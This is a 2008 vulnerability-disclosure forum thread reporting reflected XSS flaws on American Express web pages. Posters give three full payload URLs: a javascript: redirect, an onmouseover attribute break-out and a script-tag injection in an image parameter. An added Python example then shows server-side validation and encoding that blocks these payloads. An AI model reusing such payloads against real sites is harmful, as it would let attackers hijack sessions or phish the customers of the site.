Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
AmericanExpress XSSs
Posted by: C1c4Tr1Z
Date: August 04, 2008 09:37PM

Well, I think this is very (but very!) dangerous if you know how to use it.

https://www01.extra.americanexpress.com/Initial.aspx?target=javascript:alert(%22C1c4Tr1Z%22)%27/onmouseover=alert(%22C1c4Tr1Z%22);foo=%27

https://sso.americanexpress.com/SSO/request?request_type=un_createid&ssobrand=&ssolang=en_US&REALMOID=06-3dcadafa-92e6-0028-0000-151f0000151f&SSOURL=%22%0B+onmouseover=alert(/XSS/)+foo=%22&VALUE=abc (I love SSL)

I will contact the admins.

Quote

American Express takes your privacy very seriously.

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

Re: AmericanExpress XSSs
Posted by: Kyo
Date: August 05, 2008 12:12AM

ooooh, nice one.

Re: AmericanExpress XSSs
Posted by: TheInsider
Date: December 24, 2008 07:52PM

Yes, quite nice!
However, they patched it, and it took me a moment to find a new one, also in HTTPS :)

https://www01.extra.americanexpress.com/ProductImage.aspx?url=https://merpic.intelliwebservices.com/img/full/10185/b2/50fe31e266936b2887ab3ef9608f2db2.gif%22%3E%3Cscript%3Ealert(%27American%20XSSspress%27)%3C/script%3E%3Cdiv%20id=%22

http://rafelivgi.blogspot.com
Aspect9 Founder & Chief Security Architect
------------------------------------------
My job is to assess not assassinate
You can spend your life reading what others write or you can spend your life writing for others to read, choose your destiny!

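As an added example (not code from this thread, nor from American Express), here is the server-side handling that would have stopped the three payload shapes posted above: a javascript: scheme in a redirect parameter, a quote-and-whitespace break-out of an attribute (the %22%0B SSOURL case), and a "><script> break-out of an image URL. The allow-listed host, the placeholder path and the function names are constructed for the example.

```python
from html import escape
from typing import Optional
from urllib.parse import unquote, urlsplit

# Constructed allow-list: the one host the thread's image URL legitimately pointed at.
ALLOWED_IMAGE_HOSTS = {"merpic.intelliwebservices.com"}


def safe_redirect_target(raw: str, default: str = "/") -> str:
    """Accept only a site-relative path for a ?target= / SSOURL= style redirect.

    Anything carrying a scheme (javascript:, data:, http:), a network location
    (//host, or /\\host which browsers normalise to the same thing) or any
    non-path value falls back to the default landing page instead of being
    echoed into a link."""
    value = unquote(raw or "")
    parts = urlsplit(value)
    if parts.scheme or parts.netloc or not value.startswith("/") or value[1:2] in ("/", "\\"):
        return default
    return value


def safe_image_url(raw: str) -> Optional[str]:
    """Return the decoded image URL only if it is https, on an allowed host and
    free of any character that could close an attribute or open a tag."""
    value = unquote(raw or "")
    parts = urlsplit(value)
    if parts.scheme != "https" or parts.hostname not in ALLOWED_IMAGE_HOSTS:
        return None
    if any(ch in value for ch in "\"'<> \t\r\n\x0b"):
        return None
    return value


def html_attr(value: str) -> str:
    """Encode for a double-quoted HTML attribute. A path such as
    /x'/onmouseover=... passes the redirect check above, so the output
    encoding is what keeps it from breaking out of the attribute."""
    return escape(value, quote=True)


def render_img(raw: str) -> str:
    """Build the <img> tag; an unsafe url parameter gets a constructed placeholder."""
    url = safe_image_url(raw)
    if url is None:
        url = "/static/placeholder.gif"  # constructed fallback image
    return f'<img src="{html_attr(url)}" alt="">'
```

The validator and the encoder are deliberately separate: the first payload in the thread would survive a scheme check that stopped at the colon, and only attribute encoding removes the quote it relies on.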
Re: AmericanExpress XSSs
Date: December 25, 2008 11:53PM

When will Amex learn =o(
